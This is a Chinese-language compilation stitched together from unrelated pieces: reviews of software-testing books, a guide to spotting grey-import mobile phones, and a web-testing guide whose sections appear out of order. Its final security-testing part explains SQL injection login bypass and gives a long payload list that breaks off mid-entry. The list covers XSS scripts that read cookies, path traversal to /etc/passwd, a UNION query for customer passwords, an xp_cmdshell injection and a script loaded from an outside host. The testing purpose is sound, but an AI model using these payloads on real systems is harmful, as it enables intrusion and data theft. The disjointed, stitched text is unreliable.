可以把这本书当做第一本书的延续——不过我指的是作用和风格，作者当然不是同一个人了——你可以把它理解为“软件测试自动化”方面的经典入门书。作者从实际工作的角度对自动化测试进行了详细的论述，包括应该何时开始自动化、测试自动化同软件开发过程中其他工作的关系，以及测试自动化工作开展的过程。还介绍了“自动化测试框架”。不过这本书最吸引我的，还并不是它将我轻松的引入了自动化测试的世界，它还在每个章节的后面提供了很多链接和文档资料，大都可以在网上搜索到和打开。配合这些资料的学习，更深一步的理解了自动化测试的本质。 建议准备学习自动化测试和已经开始尝试自动化测试的朋友阅读多几遍。

第4.<<有效软件测试>>
作　者：[美]Elfriede Dustin/著
出版社：清华大学出版社
图书简介：
虽然这本书国内也出了影印版，但是个人感觉中文版的质量还是不错的，从中也可以看出译者有着很深的软件工程实践功底。作为一本实践经验性的著作，书中涵盖了从测试过程到测试管理，从测试方法到测试技术，以及自动化测试方面的内容，所以要求读者应当具有相当的软件测试实际工作经验，否则只有理论知识恐怕也很难理解其中的一些做法，“知其然”却无法“知其所以然”。建议先看过上面介绍的四本书（或者至少前三本）并有了一些实际测试的经验以后，再来阅读这本书效果会好一些。你会在阅读的过程中发现，原来很多测试工作开展时遇到的难题可以这样解决，原来测试工作可以通过这样来提高效率…… 虽然这本书的内容并没有特别的依赖于某些测试工具，不过看的出作者和译者的工作大都是基于RUP的，所以如果读者有这方面的了解和实践经验，阅读起来效果会更好一些。

第5.<<自动化软件测试>>
作　者：[美]Elfriede Dustin等著
出版社：清华大学出版社
图书简介：
这本书虽然在国内也有中文版，我一开始看的也是中文版，不过限于中文版的质量，这里还是推荐有能力的朋友看影印版吧。 虽然书名中大主题是“自动化软件测试”，但是这本书中介绍的更多的并不是自动化测试的具体实现，而是侧重于测试过程和测试管理方面的内容，这也是因为自动化软件测试工作的开展必须依赖于一个完善的测试过程吧。 从某个角度来看，上述的三本书从测试技术、方法和测试过程几个方面都进行了详细的论述，可以作为逐步深入的“测试学习路线图”，先看第一本入门，然后通过第二本强化对测试方法和技术的理解，然后通过第三本来更深入、全面的理解测试过程。其实书不在多，如果但作为基础学习，找到基本合适的，然后反复的阅读、研究、实践，就应该足够了。

第6.<<国际化软件测试>>
出版社　： 电子工业出版社
作者　　： 崔启亮/ 胡一鸣/
出版日期：2006年4月
版别版次：2006年4月第1版第1次印刷
图书简介：
本书阐述了国际化软件测试的根本问题，深入剖析了如何有效进行软件国际化测试和软件本地化测试，旨在帮助读者学习和掌握国际化软件测试的概念、技术、流程、方法和市场状况，分享业界同行的最佳实践。
国际化软件测试主要包括软件国际化测试和软件本地化两个阶段。本书将围绕这两个主题深入、详细的进行论述。软件外包测试与国际化软件测试紧密相关，本书最后将对其进行简要介绍。
全书分为三个部分：国际化软件基础，国际化软件测试，软件外包测试展望。每一部分根据内容的逻辑性和重要性分多章分别论述一个主题，每章以概述开始，随后重点阐述专题内容，最后进行本章小结。

第7.＜＜软件测试的有效方法＞＞ [美]佩里 著，兰雨晴等 译
　　本书提供了两种可以改进软件测试质量的策略，一是对团队软件测试能力的评估，二是对软件测试人员测试资格的评价。本书介绍了一套软件测试的方法，这种方法对应于软件开发生命周期的各个阶段，用11步软件测试过程详细讲述了从制定测试计划到执行测试以及获得最终测试结果的全过程，并对测试策略、测试工具、测试方法、测试指标等具体内容进行了全面的阐述。另外，本书还对一些特殊系统，如客户/服务器系统、基于Web的软件系统的测试过程做了专门介绍，并提出了一整套的测试指标，使测试活动能够得到量化的结果，便于做出测试结论。　　本书内容丰富、实用性强，既可作为计算机及相关专业学生的学习用书，同时又可用作广大软件工程技术人员的指导用书。　　为了保证软件能够按照计划运行，我们就需要了解有关软件测试的技术。否则，可能会导致生产率下降、收入降低、顾客不满意等情况的发生。　　本书提出了一个11步软件测试过程，涵盖了评价软件的所有测试内容。这个测试过程包含了大量的工作表和检查单，可以直接采用或修改，以测试软件的各个方面。　　在组建有效的软件测试环境时，从制定测试策略到选择和使用测试工具，读者都可以从本书中得到非常有益的指导。本书还提供了—些改进软件开发过程和提高软件测试人员能力的方法。　　

   需要特别指出的是，本书在第2版中对以下内容给出了详细的测试程序：　　·Internet／Intranet应用　　·成品软件　　·多平台环境　　·系统安全　　·数据仓库应用　　·客户／服务器系统　　·快速应用开发　　本书较少谈及理论，而更多地去指导如何解决疑难问题，为软件测试提供了有效的方法。从而可以向客户保证生产出最可靠的软件。

部分品牌鉴别方法：
1、 诺基亚
（1） 通过输入*#0000#，查看版本号，出厂日期，型号代码。
（2） 输入*#92702689#，查看主板出厂日期等资料。

2、 索尼爱立信
（1） 在待机状态下按右*左左*左*，可以查看版本信息，测试功能等。在版本信息中，型号以C结尾的为行货（如K700C），如果是I结尾的则为港行，还有小部分以A结尾，后两者都为水贷。
（2） 水货机在中国内地上不了GPRS，所以必须重新设置。

3、 三星
（1） 键盘：打开手机，查看键盘上的笔画印记，如透光，则为行货，反之为水货。
（2） 电路板：取出SIM卡，查看插片之下的电路板，如果发现上面标示的手机型号不是所需要的手机型号，则一定为水货。
（3） 包装盒：如果文字为繁体中文或全为英文者，则是水货。
（4） 随机附送光盘：如果发现光盘所标示的并非正在使用的手机型号，就要小心辨别了。

4、 摩托罗拉
（1） 产地及生产日期的查询：摩托罗拉手机背后都有一个MSN机械序号，共10位。它代表着“机型代码，厂家代码，生产年份，生产月份和产品系列号”。察看方法是关机，把后盖和电池拿开，在机身背后的条形码下面有一串号码，其中中间的十位就是MSN码，前三位为型号代码，第四码为生产厂家码，每五位为生产年份码，每六位为生产月份码，后四位为序列号。
（2） 软件和功能：水货机无移动QQ，无法在机上查版本。港行只有繁体字输入。欧版机，如果没刷中文包，那就是纯粹外文机。

5 安全测试

　　即使站点不接受信用卡支付，安全问题也是非常重要的。Web 站点收集的用户资料只能在公司内部使用。如果用户信息被黑客泄露，客户在进行交易时，就不会有安全感。

　　5.1 目录设置

　　Web 安全的第一步就是正确设置目录。每个目录下应该有 index.html 或 main.html 页面，这样就不会显示该目录下的所有内容。我服务的一个公司没有执行这条规则。我选中一幅图片，单击鼠标右键，找到该图片所在的路径"…com/objects/images"。然后在浏览器地址栏中手工输入该路径，发现该站点所有图片的列表。这可能没什么关系。我进入下一级目录 "…com/objects" ，点击 jackpot。在该目录下有很多资料，其中引起我注意的是已过期页面。该公司每个月都要更改产品价格，并且保存过期页面。我翻看了一下这些记录，就可以估计他们的边际利润以及他们为了争取一个合同还有多大的降价空间。如果某个客户在谈判之前查看了这些信息，他们在谈判桌上肯定处于上风。

　　5.2 SSL

　　很多站点使用 SSL 进行安全传送。你知道你进入一个 SSL 站点是因为浏览器出现了警告消息，而且在地址栏中的 HTTP 变成 HTTPS。如果开发部门使用了SSL，测试人员需要确定是否有相应的替代页面(适用于3.0 以下版本的浏览器，这些浏览器不支持SSL。当用户进入或离开安全站点的时候，请确认有相应的提示信息。是否有连接时间限制？超过限制时间后出现什么情况？

　　5.3 登录

　　有些站点需要用户进行登录，以验证他们的身份。这样对用户是方便的，他们不需要每次都输入个人资料。你需要验证系统阻止非法的用户名/口令登录，而能够通过有效登录。用户登录是否有次数限制? 是否限制从某些 IP 地址登录? 如果允许登录失败的次数为3，你在第三次登录的时候输入正确的用户名和口令，能通过验证吗? 口令选择有规则限制吗?  是否可以不登陆而直接浏览某个页面？

　　Web应用系统是否有超时的限制，也就是说，用户登陆后在一定时间内（例如15分钟）没有点击任何页面，是否需要重新登陆才能正常使用。

　　5.4 日志文件

　　在后台，要注意验证服务器日志工作正常。日志是否记所有的事务处理? 是否记录失败的注册企图? 是否记录被盗信用卡的使用? 是否在每次事务完成的时候都进行保存? 记录IP 地址吗? 记录用户名吗?

　　5.5 脚本语言

　　脚本语言是常见的安全隐患。每种语言的细节有所不同。有些脚本允许访问根目录。其他只允许访问邮件服务器，但是经验丰富的黑客可以将服务器用户名和口令发送给他们自己。找出站点使用了哪些脚本语言，并研究该语言的缺陷。还要需要测试没有经过授权，就不能在服务器端放置和编辑脚本的问题。最好的办法是订阅一个讨论站点使用的脚本语言安全性的新闻组。　

　6 接口测试

　　在很多情况下，web 站点不是孤立。Web 站点可能会与外部服务器通讯，请求数据、验证数据或提交订单。

　　6.1服务器接口

　　第一个需要测试的接口是浏览器与服务器的接口。测试人员提交事务，然后查看服务器记录，并验证在浏览器上看到的正好是服务器上发生的。测试人员还可以查询数据库，确认事务数据已正确保存。

　　这种测试可以归到功能测试中的表单测试和数据校验测试中

　　6.2 外部接口

　　有些 web 系统有外部接口。例如，网上商店可能要实时验证信用卡数据以减少欺诈行为的发生。测试的时候，要使用 web 接口发送一些事务数据，分别对有效信用卡、无效信用卡和被盗信用卡进行验证。如果商店只使用 Visa 卡和 Mastercard 卡， 可以尝试使用 Discover 卡的数据。(简单的客户端脚本能够在提交事务之前对代码进行识别，例如 3 表示 American Express，4 表示 Visa，5 表示 Mastercard，6 代表Discover。)通常，测试人员需要确认软件能够处理外部服务器返回的所有可能的消息。

　　这种情况在远程抄表中可能会体现到

　　6.3 错误处理

　　最容易被测试人员忽略的地方是接口错误处理。通常我们试图确认系统能够处理所有错误，但却无法预期系统所有可能的错误。尝试在处理过程中中断事务，看看会发生什么情况？订单是否完成？尝试中断用户到服务器的网络连接。尝试中断 web 服务器到信用卡验证服务器的连接。在这些情况下，系统能否正确处理这些错误？是否已对信用卡进行收费？如果用户自己中断事务处理，在订单已保存而用户没有返回网站确认的时候，需要由客户代表致电用户进行订单确认。

　　采取措施：在理解需求的基础上，充分发挥想象力，尽量比较全面的列出各种异常情况。

　　7 结论

　  无论你在测试 internet、intranet 或者是 extranet 应用程序，web 测试相对于非 web 测试来说都是更具挑战性的工作。用户对 web 页面质量有很高的期望。在很多情况下，就像业务功能一样，页面用于维护和发展公共关系，所以第一印象非常重要。

3 用户界面测试
　　3.1 导航测试

　　导航描述了用户在一个页面内操作的方式，在不同的用户接口控制之间，例如按钮、对话框、列表和窗口等；或在不同的连接页面之间。通过考虑下列问题，可以决定一个Web应用系统是否易于导航：导航是否直观？Web系统的主要部分是否可通过主页存取？Web系统是否需要站点地图、搜索引擎或其他的导航帮助？

　　在一个页面上放太多的信息往往起到与预期相反的效果。Web应用系统的用户趋向于目的驱动，很快地扫描一个Web应用系统，看是否有满足自己需要的信息，如果没有，就会很快地离开。很少有用户愿意花时间去熟悉Web应用系统的结构，因此，Web应用系统导航帮助要尽可能地准确。

　　导航的另一个重要方面是Web应用系统的页面结构、导航、菜单、连接的风格是否一致。确保用户凭直觉就知道Web应用系统里面是否还有内容，内容在什么地方。

　　Web应用系统的层次一旦决定，就要着手测试用户导航功能，让最终用户参与这种测试，效果将更加明显。

　　3.2 图形测试

　　在Web应用系统中，适当的图片和动画既能起到广告宣传的作用，又能起到美化页面的功能。一个Web应用系统的图形可以包括图片、动画、边框、颜色、字体、背景、按钮等。图形测试的内容有：

　　（1）要确保图形有明确的用途，图片或动画不要胡乱地堆在一起，以免浪费传输时间。Web应用系统的图片尺寸要尽量地小，并且要能清楚地说明某件事情，一般都链接到某个具体的页面。

　　（2）验证所有页面字体的风格是否一致。

　　（3）背景颜色应该与字体颜色和前景颜色相搭配。

　　（4）图片的大小和质量也是一个很重要的因素，一般采用JPG或GIF压缩，最好能使图片的大小减小到 30k 以下

　　（5）最后，需要验证的是文字回绕是否正确。如果说明文字指向右边的图片，应该确保该图片出现在右边。不要因为使用图片而使窗口和段落排列古怪或者出现孤行。

　　通常来说，使用少许或尽量不使用背景是个不错的选择。如果您想用背景，那么最好使用单色的，和导航条一起放在页面的左边。另外，图案和图片可能会转移用户的注意力。

　　3.3内容测试

　　内容测试用来检验Web应用系统提供信息的正确性、准确性和相关性。

　　信息的正确性是指信息是可靠的还是误传的。例如，在商品价格列表中，错误的价格可能引起财政问题甚至导致法律纠纷；信息的准确性是指是否有语法或拼写错误。这种测试通常使用一些文字处理软件来进行，例如使用Microsoft Word的"拼音与语法检查"功能；信息的相关性是指是否在当前页面可以找到与当前浏览信息相关的信息列表或入口，也就是一般Web站点中的所谓"相关文章列表"。

　　对于开发人员来说，可能先有功能然后才对这个功能进行描述。大家坐在一起讨论一些新的功能，然后开始开发，在开发的时候，开发人员可能不注重文字表达，他们添加文字可能只是为了对齐页面。不幸的是，这样出来的产品可能产生严重的误解。因此测试人员和公关部门一起检查内容的文字表达是否恰当。否则，公司可能陷入麻烦之中，也可能引起法律方面的问题。测试人员应确保站点看起来更专业些。过分地使用粗体字、大字体和下划线可能会让用户感到不舒服。在进行用户可用性方面的测试时，最好先请图形设计专家对站点进行评估。你可能不希望看到一篇到处是黑体字的文章，所以相信您也希望自己的站点能更专业一些。最后，需要确定是否列出了相关站点的链接。很多站点希望用户将邮件发到一个特定的地址，或者从某个站点下载浏览器。但是如果用户无法点击这些地址，他们可能会觉得很迷惑。

　　3.4 表格测试

　　需要验证表格是否设置正确。用户是否需要向右滚动页面才能看见产品的价格？把价格放在左边，而把产品细节放在右边是否更有效? 每一栏的宽度是否足够宽，表格里的文字是否都有折行？是否有因为某一格的内容太多，而将整行的内容拉长?

　　3.5 整体界面测试

　　整体界面是指整个Web应用系统的页面结构设计，是给用户的一个整体感。例如：当用户浏览Web应用系统时是否感到舒适，是否凭直觉就知道要找的信息在什么地方？整个Web应用系统的设计风格是否一致？

　　对整体界面的测试过程，其实是一个对最终用户进行调查的过程。一般Web应用系统采取在主页上做一个调查问卷的形式，来得到最终用户的反馈信息。

　　对所有的用户界面测试来说，都需要有外部人员（与Web应用系统开发没有联系或联系很少的人员）的参与，最好是最终用户的参与。

　　采取措施：手动测试，参与人员最好有外部人员

4 兼容性测试

　　4.1 平台测试

　　市场上有很多不同的操作系统类型，最常见的有Windows、Unix、Macintosh、Linux等。Web应用系统的最终用户究竟使用哪一种操作系统，取决于用户系统的配置。这样，就可能会发生兼容性问题，同一个应用可能在某些操作系统下能正常运行，但在另外的操作系统下可能会运行失败。

　　因此，在Web系统发布之前，需要在各种操作系统下对Web系统进行兼容性测试。

　　4.2 浏览器测试

　　浏览器是Web客户端最核心的构件，来自不同厂商的浏览器对Java，、Javascrīpt、 ActiveX、 plug-ins或不同的HTML规格有不同的支持。例如，ActiveX是Microsoft的产品，是为Internet Explorer而设计的，Javascrīpt是Netscape的产品，Java是Sun的产品等等。另外，框架和层次结构风格在不同的浏览器中也有不同的显示，甚至根本不显示。不同的浏览器对安全性和Java的设置也不一样。

　　测试浏览器兼容性的一个方法是创建一个兼容性矩阵。在这个矩阵中，测试不同厂商、不同版本的浏览器对某些构件和设置的适应性。

　　4.3 分辨率测试

　　页面版式在 640x400、600x800 或 1024x768 的分辨率模式下是否显示正常? 字体是否太小以至于无法浏览? 或者是太大? 文本和图片是否对齐?

　　4.4 Modem/连接速率

　　是否有这种情况，用户使用 28.8 modem下载一个页面需要 10 分钟，但测试人员在测试的时候使用的是 T1 专线? 用户在下载文章或演示的时候，可能会等待比较长的时间，但却不会耐心等待首页的出现。最后，需要确认图片不会太大。

　　4.5 打印机

　　用户可能会将网页打印下来。因此网也在设计的时候要考虑到打印问题，注意节约纸张和油墨。有不少用户喜欢阅读而不是盯着屏幕，因此需要验证网页打印是否正常。有时在屏幕上显示的图片和文本的对齐方式可能与打印出来的东西不一样。测试人员至少需要验证订单确认页面打印是正常的。

　　4.6 组合测试

　　最后需要进行组合测试。600x800 的分辨率在 MAC 机上可能不错，但是在 IBM 兼容机上却很难看。在 IBM 机器上使用 Netscape 能正常显示，但却无法使用 Lynx 来浏览。如果是内部使用的 web 站点，测试可能会轻松一些。如果公司指定使用某个类型的浏览器，那么只需在该浏览器上进行测试。如果所有的人都使用 T1 专线，可能不需要测试下载施加。(但需要注意的是，可能会有员工从家里拨号进入系统) 有些内部应用程序，开发部门可能在系统需求中声明不支持某些系统而只支持一些那些已设置的系统。但是，理想的情况是，系统能在所有机器上运行，这样就不会限制将来的发展和变动。

　　采取措施：根据实际情况，采取等价划分的方法，列出兼容性矩阵

　2 性能测试

　　2.1 连接速度测试

　　用户连接到Web应用系统的速度根据上网方式的变化而变化，他们或许是电话拨号，或是宽带上网。当下载一个程序时，用户可以等较长的时间，但如果仅仅访问一个页面就不会这样。如果Web系统响应时间太长（例如超过5秒钟），用户就会因没有耐心等待而离开。

　　另外，有些页面有超时的限制，如果响应速度太慢，用户可能还没来得及浏览内容，就需要重新登陆了。而且，连接速度太慢，还可能引起数据丢失，使用户得不到真实的页面。

　　2.2 负载测试

　　负载测试是为了测量Web系统在某一负载级别上的性能，以保证Web系统在需求范围内能正常工作。负载级别可以是某个时刻同时访问Web系统的用户数量，也可以是在线数据处理的数量。例如：Web应用系统能允许多少个用户同时在线？如果超过了这个数量，会出现什么现象？Web应用系统能否处理大量用户对同一个页面的请求？

　　2.3 压力测试

　　负载测试应该安排在Web系统发布以后，在实际的网络环境中进行测试。因为一个企业内部员工，特别是项目组人员总是有限的，而一个Web系统能同时处理的请求数量将远远超出这个限度，所以，只有放在Internet上，接受负载测试，其结果才是正确可信的。

　　进行压力测试是指实际破坏一个Web应用系统，测试系统的反映。压力测试是测试系统的限制和故障恢复能力，也就是测试Web应用系统会不会崩溃，在什么情况下会崩溃。黑客常常提供错误的数据负载，直到Web应用系统崩溃，接着当系统重新启动时获得存取权。

　　压力测试的区域包括表单、登陆和其他信息传输页面等。

　　负载/压力测试应该关注什么

　　测试需要验证系统能否在同一时间响应大量的用户，在用户传送大量数据的时候能否响应，系统能否长时间运行。可访问性对用户来说是极其重要的。如果用户得到“系统忙”的信息，他们可能放弃，并转向竞争对手。系统检测不仅要使用户能够正常访问站点，在很多情况下，可能会有黑客试图通过发送大量数据包来攻击服务器。出于安全的原因，测试人员应该知道当系统过载时，需要采取哪些措施，而不是简单地提升系统性能。

　　瞬间访问高峰

　　如果您的站点用于公布彩票的抽奖结果，最好使系统在中奖号码公布后的一段时间内能够响应上百万的请求。负载测试工具能够模拟 X 个用户同时访问测试站点。

　　每个用户传送大量数据

　　网上书店的多数用户可能只订购 1-5 书，但是大学书店可能会订购 5000 本有关心理学介绍的课本? 或者一个祖母为她的 50 个儿孙购买圣诞礼物(当然每个孩子都有自己的邮件地址) 系统能处理单个用户的大量数据吗?

　　长时间的使用

　　如果站点用于处理鲜花订单，那么至少希望它在母亲节前的一周内能持续运行。如果站点提供基于 web 的 email 服务，那么点最好能持续运行几个月，甚至几年。可能需要使用自动测试工具来完成这种类型的测试，因为很难通过手工完成这些测试。你可以想象组织100 个人同时点击某个站点。但是同时组织 100000 个人呢。通常，测试工具在第二次使用的时候，它创造的效益，就足以支付成本。而且，测试工具安装完成之后，再次使用的时候，只要点击几下。

　　采取措施：采用测试工具WAS、ACT协助进行测试

在Web工程过程中，基于Web系统的测试、确认和验收是一项重要而富有挑战性的工作。基于Web的系统测试与传统的软件测试不同，它不但需要检查和验证是否按照设计的要求运行，而且还要测试系统在不同用户的浏览器端的显示是否合适。重要的是，还要从最终用户的角度进行安全性和可用性测试。然而，Internet和Web媒体的不可预见性使测试基于Web的系统变得困难。因此，我们必须为测试和评估复杂的基于Web的系统研究新的方法和技术。

　　本文将 web 测试分为 6 个部分：

　　1.  功能测试

　　2.  性能测试（包括负载/压力测试）

　　3.  用户界面测试

　　4.  兼容性测试

　　5.  安全测试

　　6.  接口测试

　　本文的目的是覆盖 web 测试的各个方面，未就某一主题进行深入说明。

　　1 功能测试

　　1.1 链接测试

　　链接是Web应用系统的一个主要特征，它是在页面之间切换和指导用户去一些不知道地址的页面的主要手段。链接测试可分为三个方面。首先，测试所有链接是否按指示的那样确实链接到了该链接的页面；其次，测试所链接的页面是否存在；最后，保证Web应用系统上没有孤立的页面，所谓孤立页面是指没有链接指向该页面，只有知道正确的URL地址才能访问。

　　链接测试可以自动进行，现在已经有许多工具可以采用。链接测试必须在集成测试阶段完成，也就是说，在整个Web应用系统的所有页面开发完成之后进行链接测试。

　　采取措施：采用自动检测网站链接的软件来进行。

　　推荐软件：

　　Xenu Link Sleuth 免费 绿色免安装软件

　　HTML Link Validator 共享（30天试用）

　　1.2 表单测试

　　当用户通过表单提交信息的时候，都希望表单能正常工作。

　　如果使用表单来进行在线注册，要确保提交按钮能正常工作，当注册完成后应返回注册成功的消息。如果使用表单收集配送信息，应确保程序能够正确处理这些数据，最后能让顾客能让客户收到包裹。要测试这些程序，需要验证服务器能正确保存这些数据，而且后台运行的程序能正确解释和使用这些信息。

　　当用户使用表单进行用户注册、登陆、信息提交等操作时，我们必须测试提交操作的完整性，以校验提交给服务器的信息的正确性。例如：用户填写的出生日期与职业是否恰当，填写的所属省份与所在城市是否匹配等。如果使用了默认值，还要检验默认值的正确性。如果表单只能接受指定的某些值，则也要进行测试。例如：只能接受某些字符，测试时可以跳过这些字符，看系统是否会报错。

　　1.3 数据校验

　　如果系根据业务规则需要对用户输入进行校验，需要保证这些校验功能正常工作。例如，省份的字段可以用一个有效列表进行校验。在这种情况下，需要验证列表完整而且程序正确调用了该列表(例如在列表中添加一个测试值，确定系统能够接受这个测试值)。

　　在测试表单时，该项测试和表单测试可能会有一些重复。

　　1.2和1.3的采取措施：第一个完整的版本采用手动检查，同时形成WinRunner（QTP）脚本；回归测试以及升级版本主要靠WinRunner（QTP）自动回放测试。

　　1.4 cookies测试

　　Cookies通常用来存储用户信息和用户在某应用系统的操作，当一个用户使用Cookies访问了某一个应用系统时，Web服务器将发送关于用户的信息，把该信息以Cookies的形式存储在客户端计算机上，这可用来创建动态和自定义页面或者存储登陆等信息。

　　如果Web应用系统使用了Cookies，就必须检查Cookies是否能正常工作。测试的内容可包括Cookies是否起作用，是否按预定的时间进行保存，刷新对Cookies有什么影响等。如果在 cookies 中保存了注册信息，请确认该 cookie能够正常工作而且已对这些信息已经加密。如果使用 cookie 来统计次数，需要验证次数累计正确。

　　采取措施：

　　1 采用黑盒测试：采用上面提到的方法进行测试

　　2 采用查看cookies的软件进行（初步的想法）

　　可以选择采用的软件

　　IECookiesView v1.50

　　Cookies Manager v1.1

1.5 数据库测试

　　在Web应用技术中，数据库起着重要的作用，数据库为Web应用系统的管理、运行、查询和实现用户对数据存储的请求等提供空间。在Web应用中，最常用的数据库类型是关系型数据库，可以使用SQL对信息进行处理。

　　在使用了数据库的Web应用系统中，一般情况下，可能发生两种错误，分别是数据一致性错误和输出错误。数据一致性错误主要是由于用户提交的表单信息不正确而造成的，而输出错误主要是由于网络速度或程序设计问题等引起的，针对这两种情况，可分别进行测试。

　　采取措施：暂时没有更好的测试方法

　　考虑结合到1.2和1.3的测试中

　　1.6 应用程序特定的功能需求

　　最重要的是，测试人员需要对应用程序特定的功能需求进行验证。尝试用户可能进行的所有操作：下订单、更改订单、取消订单、核对订单状态、在货物发送之前更改送货信息、在线支付等等。这是用户之所以使用网站的原因，一定要确认网站能像广告宣传的那样神奇。

　　采取措施：深刻理解需求说明文档

　　1.7 设计语言测试

　　Web设计语言版本的差异可以引起客户端或服务器端严重的问题，例如使用哪种版本的HTML等。当在分布式环境中开发时，开发人员都不在一起，这个问题就显得尤为重要。除了HTML的版本问题外，不同的脚本语言，例如Java、Javascrīpt、 ActiveX、VBscrīpt或Perl等也要进行验证。

　　暂时没有方法测试，可以多参考一点讨论组内的更新信息

  DJANGO的那篇文档中只介绍了网络中常见的安全问题以及如何从程序的角度去防御它们,并未介绍如何针对安全问题进行测试.本章的主要内容是针对上章中提及的安全性问题介绍如何进行安全性测试.

  1.SQL Injection(SQL 注入)

  (1)如何进行SQL注入测试?

• 首先找到带有参数传递的URL页面,如搜索页面,登录页面,提交评论页面等等.

• 其次,在URL参数或表单中加入某些特殊的SQL语句或SQL片断,如在登录页面的URL中输入HTTP://DOMAIN/INDEX.ASP?USERNAME=HI' OR 1=1--

注1：根据实际情况,SQL注入请求可以使用以下语句: ' or 1=1- - " or 1=1- - or 1=1- - ' or 'a'='a " or "a"="a ') or ('a'='a     注2：为什么是OR，以及',――是特殊的字符呢？ 例子：在登录时进行身份验证时，通常使用如下语句来进行验证：sql=select * from user where username='username' and pwd='password' 如 输入http://duck/index.asp?username=admin' or 1='1&pwd=11，SQL语句会变成以下：sql=select * from user where username='admin' or 1='1' and password='11' '与admin前面的'组成了一个查询条件,即username='admin',接下来的语句将按下一个查询条件来执行. 接下来是OR查询条件,OR是一个逻辑运算符，在判断多个条件的时候，只要一个成立，则等式就成立，后面的AND就不再时行判断了，也就是说我们绕过了密码验证，我们只用用户名就可以登录. 如 输入http://duck/index.asp?username=admin'--&pwd=11，SQL语句会变成以下sql=select * from user where name='admin' --' and pasword='11',  '与admin前面的'组成了一个查询条件,即username='admin',接下来的语句将按下一个查询条件来执行  接下来是"--"查询条件,“--”是忽略或注释,上述通过连接符注释掉后面的密码验证(注:对ACCESS数据库无效).

• 最后,验证是否能入侵成功或是出错的信息是否包含关于数据库服务器的相关信息;如果能说明存在SQL安全漏洞.
• 试想,如果网站存在SQL注入的危险,对于有经验的恶意用户还可能猜出数据库表和表结构,并对数据库表进行增\删\改的操作,这样造成的后果是非常严重的.

  (2)如何预防SQL注入?

   从应用程序的角度来讲,我们要做以下三项工作:

• 转义敏感字符及字符串(SQL的敏感字符包括“exec”,”xp_”,”sp_”,”declare”,”Union”,”cmd”,”+”,”//”,”..”,”;”,” ‘ ”,”--”,”%”,”0x”,” ><=!-*/()| ”,和”空格”).

• 屏蔽出错信息：阻止攻击者知道攻击的结果

• 在服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作.
  

   从测试人员的角度来讲,在程序开发前(即需求阶段),我们就应该有意识的将安全性检查应用到需求测试中,例如对一个表单需求进行检查时,我们一般检验以下几项安全性问题:

• 需求中应说明表单中某一FIELD的类型,长度,以及取值范围(主要作用就是禁止输入敏感字符)
• 需求中应说明如果超出表单规定的类型,长度,以及取值范围的,应用程序应给出不包含任何代码或数据库信息的错误提示.

   当然在执行测试的过程中,我们也需求对上述两项内容进行测试.

  2.Cross-site scritping(XSS):(跨站点脚本攻击)

  (1)如何进行XSS测试?

• <!--[if !supportLists]-->首先,找到带有参数传递的URL,如登录页面,搜索页面,提交评论,发表留言页面等等。
• <!--[if !supportLists]-->其次,在页面参数中输入如下语句(如:Javascrīpt,VB scrīpt, HTML,ActiveX, Flash)来进行测试：

<scrīpt>alert(document.cookie)</scrīpt>

      注:其它的XSS测试语句

><scrīpt>alert(document.cookie)</scrīpt> ='><scrīpt>alert(document.cookie)</scrīpt> <scrīpt>alert(document.cookie)</scrīpt> <scrīpt>alert(vulnerable)</scrīpt> %3Cscrīpt%3Ealert('XSS')%3C/scrīpt%3E <scrīpt>alert('XSS')</scrīpt> <img src="javascrīpt:alert('XSS')"> %0a%0a<scrīpt>alert(\"Vulnerable\")</scrīpt>.jsp %22%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %3c/a%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %3c/title%3e%3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e %3cscrīpt%3ealert(%22xss%22)%3c/scrīpt%3e/index.html %3f.jsp %3f.jsp &lt;scrīpt&gt;alert('Vulnerable');&lt;/scrīpt&gt <scrīpt>alert('Vulnerable')</scrīpt> ?sql_debug=1 a%5c.aspx a.jsp/<scrīpt>alert('Vulnerable')</scrīpt> a/ a?<scrīpt>alert('Vulnerable')</scrīpt> "><scrīpt>alert('Vulnerable')</scrīpt> ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&& %22%3E%3Cscrīpt%3Ealert(document.cookie)%3C/scrīpt%3E %3Cscrīpt%3Ealert(document. domain);%3C/scrīpt%3E& %3Cscrīpt%3Ealert(document.domain);%3C/scrīpt%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= ../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini '';!--"<XSS>=&{()} <IMG SRC="javascrīpt:alert('XSS');"> <IMG SRC=javascrīpt:alert('XSS')> <IMG SRC=javascrīpt:alert('XSS')> <IMG SRC=javascrīpt:alert(&quot;XSS&quot;)> <IMG SRC=javascrīpt:alert('XSS')> <IMG SRC=javascrīpt:alert('XSS')> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav ascrīpt:alert('XSS');"> <IMG SRC="jav ascrīpt:alert('XSS');"> <IMG SRC="jav ascrīpt:alert('XSS');"> "<IMG SRC=java\0scrīpt:alert(\"XSS\")>";' > out <IMG SRC=" javascrīpt:alert('XSS');"> <scrīpt>a=/XSS/alert(a.source)</scrīpt> <BODY BACKGROUND="javascrīpt:alert('XSS')"> <BODY ōNLOAD=alert('XSS')> <IMG DYNSRC="javascrīpt:alert('XSS')"> <IMG LOWSRC="javascrīpt:alert('XSS')"> <BGSOUND SRC="javascrīpt:alert('XSS');"> <br size="&{alert('XSS')}"> <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer> <LINK REL="stylesheet" HREF="javascrīpt:alert('XSS');"> <IMG SRC='vbscrīpt:msgbox("XSS")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescrīpt:[code]"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascrīpt:alert('XSS');"> <IFRAME SRC=javascrīpt:alert('XSS')></IFRAME> <FRAMESET><FRAME 